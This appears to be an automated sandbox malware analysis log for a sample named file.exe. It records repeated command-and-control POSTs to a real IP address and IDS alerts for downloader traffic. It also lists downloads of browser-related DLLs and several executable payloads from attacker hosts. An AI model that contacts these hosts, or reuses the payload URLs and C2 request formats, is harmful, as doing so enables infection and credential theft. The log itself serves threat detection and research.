Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 162.159.128.233 162.159.128.233

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49749 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49759 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49812 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49830 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49853 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49880 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49884 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49888 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49903 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49908 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49899 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49927 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49960 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50025 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49984 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50016 -> 104.21.80.1:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C59CC60 PR_Recv,

0_2_6C59CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/1521297942/n4e23hz.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
